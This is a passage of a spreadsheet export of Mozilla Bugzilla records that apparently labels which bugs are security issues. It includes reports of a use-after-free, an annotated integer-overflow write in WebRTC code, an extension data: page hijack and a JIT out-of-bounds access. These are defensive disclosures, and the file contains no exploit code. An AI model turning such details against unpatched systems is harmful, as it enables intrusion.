Steps to reproduce:
Load a manifest on multiple different directory levels.
Actual results:
Did not work because of the relative paths to the l20n resources.
The resources are being loaded relative to the document, not to the manifest file, which makes it quite impossible to use a manifest file unless you'll only use it for files in the same folder.
Example setup:
/l20n.json
    {
      "languages": [
        ...
      ],
      "resources": [
        "{{lang}}.l20n"
      ]
    }
/index.html
    &lt;link rel="localization" type="application/json" href="l20n.json" /&gt;
/test/index.html
    &lt;link rel="localization" type="application/json" href="../l20n.json" /&gt;
Both files point to the same manifest, which has resources at the same level. What you'd expect is that both files result in having the same l20n applied.
Instead, the path to the loaded resources will look like this:
for /index.html: /en.l20n
for /test/index.html: /test/en.l20n
Expected results:
Relative paths to resources in a manifest should be relative the manifest file, not to the document that includes the manifest.
What I would have preferred was for the resources to be loaded like this:
for /index.html: /en.l20n
for /test/index.html: /en.l20n
Much like how relative paths in @import or url() in CSS are relative to the CSS file (not to how the document that loads the CSS file), relative paths in manifest file should be relative to the manifest file.
--
I won't attach a patch since my local setup (running https://github.com/l20n/l20n.min.js/blob/master/l20n.js) is not really up-to-date with the current l20n master.
You could use pretty much the same code as Resource::relativeToSelf (with the manifest url being the self.id used there).
Only "problem" however is that it would also have to apply this to non-{{lang}} resources too, so it would either have to calculate the full path immediately (add linkResource as string), or defer adding that path using a .bind (add linkResource as function) and no longer have the template/uri difference currently used to differentiate for _none usage.
--
The below code serves only as an example of what I'd like to accomplish. It's based on old code.
    function loadManifest(url) {
      var deferred = new L20n.Promise();
      L20n.IO.load(url, true).then(
        function(text) {
          var manifest = JSON.parse(text);
          var langList = L20n.Intl.prioritizeLocales(manifest.languages);
          ctx.registerLocales.apply(this, langList);
          var resource = function(manifestUrl, lang) {
            var url = manifest.resources[0].replace("{{lang}}", lang);
            if (url[0] == '/') {
              return url;
            }
            var dirname = manifestUrl.split('/').slice(0, -1).join('/');
            if (dirname) {
              // strip the trailing slash if present
              if (dirname[dirname.length - 1] == '/') {
                dirname = dirname.slice(0, dirname.length - 1);
              }
              return dirname + '/' + url;
            } else {
              return './' + url;
            }
          };
          ctx.linkResource(resource.bind(this, url));
          deferred.fulfill();
        }
      );
      return deferred;
    }</t>
        </is>
      </c>
      <c r="X6109" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6110">
      <c r="A6110" t="n">
        <v>604853</v>
      </c>
      <c r="B6110" t="inlineStr">
        <is>
          <t>2010-10-15 21:18:58 -0700</t>
        </is>
      </c>
      <c r="C6110" t="inlineStr">
        <is>
          <t>Please add Camino 2.0.5 to bouncer</t>
        </is>
      </c>
      <c r="D6110" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E6110" t="n">
        <v>1</v>
      </c>
      <c r="F6110" t="n">
        <v>1</v>
      </c>
      <c r="G6110" t="n">
        <v>5</v>
      </c>
      <c r="H6110" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6110" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J6110" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6110" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6110" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6110" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6110" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6110" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6110" t="inlineStr"/>
      <c r="Q6110" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6110" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6110" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6110" t="n">
        <v>1</v>
      </c>
      <c r="U6110" t="n">
        <v>0</v>
      </c>
      <c r="V6110" t="n">
        <v>2</v>
      </c>
      <c r="W6110" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #588671 +++
We'll be releasing Camino 2.0.5 late next week, possibly as early as Thursday (21 Oct), and would like it to be added to bouncer.
Camino 2.0.5 en-US will be
http://releases.mozilla.org/pub/mozilla.org/camino/releases/en-US/Camino-2.0.5.dmg
; the multi-lang build will be in /all/ as usual.
Thanks!</t>
        </is>
      </c>
      <c r="X6110" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6111">
      <c r="A6111" t="n">
        <v>750109</v>
      </c>
      <c r="B6111" t="inlineStr">
        <is>
          <t>2012-04-29 12:35:52 -0700</t>
        </is>
      </c>
      <c r="C6111" t="inlineStr">
        <is>
          <t>Use-after-free in nsINode::ReplaceOrInsertBefore</t>
        </is>
      </c>
      <c r="D6111" t="inlineStr">
        <is>
          <t>2024-05-29 16:00:49 -0700</t>
        </is>
      </c>
      <c r="E6111" t="n">
        <v>1</v>
      </c>
      <c r="F6111" t="n">
        <v>1</v>
      </c>
      <c r="G6111" t="n">
        <v>3</v>
      </c>
      <c r="H6111" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6111" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6111" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K6111" t="inlineStr">
        <is>
          <t>12 Branch</t>
        </is>
      </c>
      <c r="L6111" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6111" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6111" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6111" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6111" t="inlineStr">
        <is>
          <t>[asan][sg:critical][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q6111" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6111" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6111" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6111" t="n">
        <v>1</v>
      </c>
      <c r="U6111" t="n">
        <v>0</v>
      </c>
      <c r="V6111" t="n">
        <v>15</v>
      </c>
      <c r="W6111" t="inlineStr">
        <is>
          <t>Created attachment 619433
PoC triggering the crash.
Use-after-free is triggered during replacing/inserting node in document. 
Crashes on:
  - 14.0a1 (Ubuntu 11.11, Linux x86-64), 
  - 15.0a1 (Windows 7, x86-64), 
  - 12.0 (Windows XP SP3).
Does not crash on 10.0.2.
Attached test-case is a bit flaky, but it will crash browser after 2-5 reloads. ASan log is from version 14.0a1.</t>
        </is>
      </c>
      <c r="X6111" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6112">
      <c r="A6112" t="n">
        <v>1120133</v>
      </c>
      <c r="B6112" t="inlineStr">
        <is>
          <t>2015-01-10 15:23:56 -0800</t>
        </is>
      </c>
      <c r="C6112" t="inlineStr">
        <is>
          <t>Enhance copy-to-clipboard, for logviewer/raw log urls on current job</t>
        </is>
      </c>
      <c r="D6112" t="inlineStr">
        <is>
          <t>2015-05-20 04:31:24 -0700</t>
        </is>
      </c>
      <c r="E6112" t="n">
        <v>1</v>
      </c>
      <c r="F6112" t="n">
        <v>1</v>
      </c>
      <c r="G6112" t="n">
        <v>7</v>
      </c>
      <c r="H6112" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6112" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J6112" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K6112" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L6112" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6112" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6112" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6112" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6112" t="inlineStr"/>
      <c r="Q6112" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R6112" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6112" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6112" t="n">
        <v>1</v>
      </c>
      <c r="U6112" t="n">
        <v>0</v>
      </c>
      <c r="V6112" t="n">
        <v>22</v>
      </c>
      <c r="W6112" t="inlineStr">
        <is>
          <t>Based on convo with Ryan yesterday, one repeated sheriff task is to provide a failed job log url to repo owners in various channels. His workflow to get that link, is to use the RMB-context menu on the job navbar log icon. The content of that context menu and its 'Copy link location' entry in it varies depending on whether the icon requested by/for sheriffs is font-awesome, or svg/img.
After spending more time thinking about the user problem, I think sheriffs shouldn't need to navigate into that RMB-context menu at all for this task.
Instead I pose when a job is selected, we provide a shortcut which copies the relevant link to the user's copy buffer. It seems we could do this given we:
o know there is always just one job selected
o have the link fragments
o already construct the full path for a manual click
o already know if the log is unavailable (and could issue a warning)
Proposed workflow:
o user clicks on a job
o user issues a shortcut (eg. ctrl+[something..])
o the logviewer link is copied to their buffer
o [optional] - 1sec css pulse of the icon to confirm the copy happened
o user pastes it in channel
I pose the same be done for the raw log.</t>
        </is>
      </c>
      <c r="X6112" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6113">
      <c r="A6113" t="n">
        <v>84731</v>
      </c>
      <c r="B6113" t="inlineStr">
        <is>
          <t>2001-06-08 10:43:35 -0700</t>
        </is>
      </c>
      <c r="C6113" t="inlineStr">
        <is>
          <t>Mail send fails to complete when SSL set to "When Available"</t>
        </is>
      </c>
      <c r="D6113" t="inlineStr">
        <is>
          <t>2008-07-31 01:21:41 -0700</t>
        </is>
      </c>
      <c r="E6113" t="n">
        <v>1</v>
      </c>
      <c r="F6113" t="n">
        <v>1</v>
      </c>
      <c r="G6113" t="n">
        <v>3</v>
      </c>
      <c r="H6113" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6113" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J6113" t="inlineStr">
        <is>
          <t>Backend</t>
        </is>
      </c>
      <c r="K6113" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6113" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6113" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N6113" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6113" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6113" t="inlineStr">
        <is>
          <t>[nsbeta1+][PDT+]</t>
        </is>
      </c>
      <c r="Q6113" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6113" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6113" t="inlineStr">
        <is>
          <t>mozilla0.9.2</t>
        </is>
      </c>
      <c r="T6113" t="n">
        <v>1</v>
      </c>
      <c r="U6113" t="n">
        <v>1</v>
      </c>
      <c r="V6113" t="n">
        <v>47</v>
      </c>
      <c r="W6113" t="inlineStr">
        <is>
          <t>seen on commercial builds:
windows 2001-06-08-06-trink
mac 2001-06-08-01-trunk
note: linux 2001-06-08-09-trunk is okay
-Compose a mail message (in pop or imap, plain text or html) 
-Send the messaage
the status bar spins perpetually "sending message"
the message is never sent</t>
        </is>
      </c>
      <c r="X6113" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6114">
      <c r="A6114" t="n">
        <v>463648</v>
      </c>
      <c r="B6114" t="inlineStr">
        <is>
          <t>2008-11-07 08:47:39 -0800</t>
        </is>
      </c>
      <c r="C6114" t="inlineStr">
        <is>
          <t>When configuring mozilla with a relative path, make check fails in js/src</t>
        </is>
      </c>
      <c r="D6114" t="inlineStr">
        <is>
          <t>2018-03-02 12:12:20 -0800</t>
        </is>
      </c>
      <c r="E6114" t="n">
        <v>1</v>
      </c>
      <c r="F6114" t="n">
        <v>1</v>
      </c>
      <c r="G6114" t="n">
        <v>7</v>
      </c>
      <c r="H6114" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6114" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J6114" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6114" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6114" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6114" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6114" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6114" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6114" t="inlineStr"/>
      <c r="Q6114" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6114" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6114" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T6114" t="n">
        <v>1</v>
      </c>
      <c r="U6114" t="n">
        <v>0</v>
      </c>
      <c r="V6114" t="n">
        <v>8</v>
      </c>
      <c r="W6114" t="inlineStr">
        <is>
          <t>I don't usually use client.mk to build, but rather run ../src/configure directly.
This causes `make check` to fail in js/src:
/usr/bin/python ../../../src/js/src/config/check-sync-dirs.py ../../../src/js/src/config ../src/config
TEST-FAIL | build file copies are not in sync
file(s) found in: /builds/mddepend-removal/src/js/src/config
differ from their originals in: /builds/mddepend-removal/ff-release-m32/js/src/config
This is caused by the toplevel configure passing --with-sync-build-files=../src
It should use an absolute path instead of a relative path.</t>
        </is>
      </c>
      <c r="X6114" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6115">
      <c r="A6115" t="n">
        <v>539522</v>
      </c>
      <c r="B6115" t="inlineStr">
        <is>
          <t>2010-01-13 12:37:13 -0800</t>
        </is>
      </c>
      <c r="C6115" t="inlineStr">
        <is>
          <t>Integrate CGI script for mirror uptake into Django app</t>
        </is>
      </c>
      <c r="D6115" t="inlineStr">
        <is>
          <t>2010-01-18 07:43:42 -0800</t>
        </is>
      </c>
      <c r="E6115" t="n">
        <v>1</v>
      </c>
      <c r="F6115" t="n">
        <v>1</v>
      </c>
      <c r="G6115" t="n">
        <v>4</v>
      </c>
      <c r="H6115" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6115" t="inlineStr">
        <is>
          <t>Webtools</t>
        </is>
      </c>
      <c r="J6115" t="inlineStr">
        <is>
          <t>Bouncer</t>
        </is>
      </c>
      <c r="K6115" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6115" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6115" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6115" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6115" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6115" t="inlineStr">
        <is>
          <t>[tx]</t>
        </is>
      </c>
      <c r="Q6115" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R6115" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S6115" t="inlineStr">
        <is>
          <t>Future</t>
        </is>
      </c>
      <c r="T6115" t="n">
        <v>1</v>
      </c>
      <c r="U6115" t="n">
        <v>0</v>
      </c>
      <c r="V6115" t="n">
        <v>3</v>
      </c>
      <c r="W6115" t="inlineStr">
        <is>
          <t>There's a CGI script to ping mirror uptake in bug 408673, but we can probably integrate that into the django app. Priority: low.</t>
        </is>
      </c>
      <c r="X6115" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6116">
      <c r="A6116" t="n">
        <v>1544181</v>
      </c>
      <c r="B6116" t="inlineStr">
        <is>
          <t>2019-04-12 22:27:25 -0700</t>
        </is>
      </c>
      <c r="C6116" t="inlineStr">
        <is>
          <t>Potential out-of-bounds write in GMPDecodeData</t>
        </is>
      </c>
      <c r="D6116" t="inlineStr">
        <is>
          <t>2020-06-05 00:40:34 -0700</t>
        </is>
      </c>
      <c r="E6116" t="n">
        <v>1</v>
      </c>
      <c r="F6116" t="n">
        <v>1</v>
      </c>
      <c r="G6116" t="n">
        <v>3</v>
      </c>
      <c r="H6116" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6116" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6116" t="inlineStr">
        <is>
          <t>WebRTC</t>
        </is>
      </c>
      <c r="K6116" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6116" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6116" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6116" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6116" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6116" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main75+][adv-esr68.7+]</t>
        </is>
      </c>
      <c r="Q6116" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6116" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6116" t="inlineStr">
        <is>
          <t>mozilla76</t>
        </is>
      </c>
      <c r="T6116" t="n">
        <v>1</v>
      </c>
      <c r="U6116" t="n">
        <v>0</v>
      </c>
      <c r="V6116" t="n">
        <v>12</v>
      </c>
      <c r="W6116" t="inlineStr">
        <is>
          <t>I believe there is a potential out-of-bounds write in GMPDecodeData [1]:
```
  GMPDecodeData(const webrtc::EncodedImage&amp; aInputImage, bool aMissingFrames,
                int64_t aRenderTimeMs)
      : mImage(aInputImage),
        mMissingFrames(aMissingFrames),
        mRenderTimeMs(aRenderTimeMs) {
    // We want to use this for queuing, and the calling code recycles the
    // buffer on return from Decode()
    mImage._length = aInputImage._length;
    mImage._size =
        aInputImage._length +
        webrtc::EncodedImage::GetBufferPaddingBytes(webrtc::kVideoCodecH264); // &lt;-- pick huge enough _length such that _length + 8 overflows
    mImage._buffer = new uint8_t[mImage._size];                               // &lt;-- allocate array smaller than _length
    memcpy(mImage._buffer, aInputImage._buffer, aInputImage._length);         // &lt;-- copy _length bytes
```
I'm not sure if this is easy to trigger or if it's really any more serious than
a crash, but seemed worth reporting.  Apologies if this turns out to not be a
concern.
[1] https://searchfox.org/mozilla-central/source/media/webrtc/signaling/src/media-conduit/WebrtcGmpVideoCodec.h#129-134</t>
        </is>
      </c>
      <c r="X6116" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6117">
      <c r="A6117" t="n">
        <v>1319070</v>
      </c>
      <c r="B6117" t="inlineStr">
        <is>
          <t>2016-11-21 06:21:49 -0800</t>
        </is>
      </c>
      <c r="C6117" t="inlineStr">
        <is>
          <t>Web Extension's data: scheme pages can be controlled by other extensions</t>
        </is>
      </c>
      <c r="D6117" t="inlineStr">
        <is>
          <t>2024-05-30 09:23:20 -0700</t>
        </is>
      </c>
      <c r="E6117" t="n">
        <v>1</v>
      </c>
      <c r="F6117" t="n">
        <v>1</v>
      </c>
      <c r="G6117" t="n">
        <v>3</v>
      </c>
      <c r="H6117" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6117" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J6117" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6117" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6117" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6117" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6117" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6117" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6117" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main51+][adv-esr45.7+]</t>
        </is>
      </c>
      <c r="Q6117" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6117" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6117" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T6117" t="n">
        <v>1</v>
      </c>
      <c r="U6117" t="n">
        <v>0</v>
      </c>
      <c r="V6117" t="n">
        <v>78</v>
      </c>
      <c r="W6117" t="inlineStr">
        <is>
          <t>Created attachment 8812756
poc.zip
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50
Steps to reproduce:
1) Install both "attacker" and "victim" extensions in the attachment to Firefox
2. Open the browser_action of "victim" and click a link "Click to Reproduce" in the page
Actual results:
You can see a message "victim is pwned by attacker" in the page and an alert is shown with the content of victim extension's localStorage, i.e., SECRET
This means that the the attacker's extensions can control other extension's pages with data: scheme.
The cause of this issue is below.
https://dxr.mozilla.org/mozilla-central/source/toolkit/modules/addons/MatchPattern.jsm#21
Here the data: scheme is whitelisted but data: documents in Firefox inherits opener's context.
Expected results:
The data: scheme pages in another extension should be controlled by other extensions.</t>
        </is>
      </c>
      <c r="X6117" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6118">
      <c r="A6118" t="n">
        <v>1020041</v>
      </c>
      <c r="B6118" t="inlineStr">
        <is>
          <t>2014-06-03 18:31:07 -0700</t>
        </is>
      </c>
      <c r="C6118" t="inlineStr">
        <is>
          <t>nsStandardURL::SetHost called net_ToLowerCase with a bogus pointer, #3</t>
        </is>
      </c>
      <c r="D6118" t="inlineStr">
        <is>
          <t>2016-06-04 16:01:58 -0700</t>
        </is>
      </c>
      <c r="E6118" t="n">
        <v>1</v>
      </c>
      <c r="F6118" t="n">
        <v>1</v>
      </c>
      <c r="G6118" t="n">
        <v>3</v>
      </c>
      <c r="H6118" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6118" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6118" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K6118" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6118" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6118" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6118" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6118" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6118" t="inlineStr">
        <is>
          <t>[adv-main31+]</t>
        </is>
      </c>
      <c r="Q6118" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6118" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6118" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T6118" t="n">
        <v>1</v>
      </c>
      <c r="U6118" t="n">
        <v>0</v>
      </c>
      <c r="V6118" t="n">
        <v>46</v>
      </c>
      <c r="W6118" t="inlineStr">
        <is>
          <t>Created attachment 8433759
testcase (crashes Firefox)
Same symptoms as bug 991471 and bug 1005578, different testcase.</t>
        </is>
      </c>
      <c r="X6118" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6119">
      <c r="A6119" t="n">
        <v>568564</v>
      </c>
      <c r="B6119" t="inlineStr">
        <is>
          <t>2010-05-27 10:55:23 -0700</t>
        </is>
      </c>
      <c r="C6119" t="inlineStr">
        <is>
          <t>Suppress the script filename for cross-origin error events (SA39925)</t>
        </is>
      </c>
      <c r="D6119" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E6119" t="n">
        <v>1</v>
      </c>
      <c r="F6119" t="n">
        <v>1</v>
      </c>
      <c r="G6119" t="n">
        <v>3</v>
      </c>
      <c r="H6119" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6119" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6119" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K6119" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6119" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6119" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6119" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6119" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6119" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q6119" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6119" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6119" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6119" t="n">
        <v>1</v>
      </c>
      <c r="U6119" t="n">
        <v>1</v>
      </c>
      <c r="V6119" t="n">
        <v>22</v>
      </c>
      <c r="W6119" t="inlineStr">
        <is>
          <t>See http://secunia.com/advisories/39925</t>
        </is>
      </c>
      <c r="X6119" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6120">
      <c r="A6120" t="n">
        <v>1009952</v>
      </c>
      <c r="B6120" t="inlineStr">
        <is>
          <t>2014-05-13 17:09:44 -0700</t>
        </is>
      </c>
      <c r="C6120" t="inlineStr">
        <is>
          <t>Loads/stores from "static" typed array objects don't respond well to neutering of the underlying buffer</t>
        </is>
      </c>
      <c r="D6120" t="inlineStr">
        <is>
          <t>2015-08-30 12:12:22 -0700</t>
        </is>
      </c>
      <c r="E6120" t="n">
        <v>1</v>
      </c>
      <c r="F6120" t="n">
        <v>1</v>
      </c>
      <c r="G6120" t="n">
        <v>3</v>
      </c>
      <c r="H6120" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6120" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6120" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K6120" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6120" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6120" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6120" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6120" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6120" t="inlineStr">
        <is>
          <t>[adv-main30+][adv-esr24.6+][qa-]</t>
        </is>
      </c>
      <c r="Q6120" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6120" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6120" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T6120" t="n">
        <v>1</v>
      </c>
      <c r="U6120" t="n">
        <v>0</v>
      </c>
      <c r="V6120" t="n">
        <v>32</v>
      </c>
      <c r="W6120" t="inlineStr">
        <is>
          <t>Created attachment 8422102
Tests for MStoreTypedArrayElementStatic/MLoadTypedArrayElementStatic usage being unguarded by constraints
La la la la la...
Found while auditing bug 991981.  The *second* time.  (That is, skimming the patch that was the result of the audit, a second time, prior to posting of one part of that patch.)  Better late than never!
This is an out-of-bounds read/write access -- may require some care to get memory overlaid just right, but this is sec-critical territory.  Spot-checking esr24 suggests this is a problem on all branches.
Interestingly this is x86-32 only -- I think because we do this optimization only when we can efficiently burn pointers into JIT code.  The actual rationale is not recorded in source right now.</t>
        </is>
      </c>
      <c r="X6120" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6121">
      <c r="A6121" t="n">
        <v>1475775</v>
      </c>
      <c r="B6121" t="inlineStr">
        <is>
          <t>2018-07-14 01:46:29 -0700</t>
        </is>
      </c>
      <c r="C6121" t="inlineStr">
        <is>
          <t>key3.db encryption key remains on disk from pre-Firefox-58 (becomes issue if adding a master password post-58)</t>
        </is>
      </c>
      <c r="D6121" t="inlineStr">
        <is>
          <t>2020-01-07 19:33:58 -0800</t>
        </is>
      </c>
      <c r="E6121" t="n">
        <v>1</v>
      </c>
      <c r="F6121" t="n">
        <v>1</v>
      </c>
      <c r="G6121" t="n">
        <v>3</v>
      </c>
      <c r="H6121" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6121" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6121" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K6121" t="inlineStr">
        <is>
          <t>61 Branch</t>
        </is>
      </c>
      <c r="L6121" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6121" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
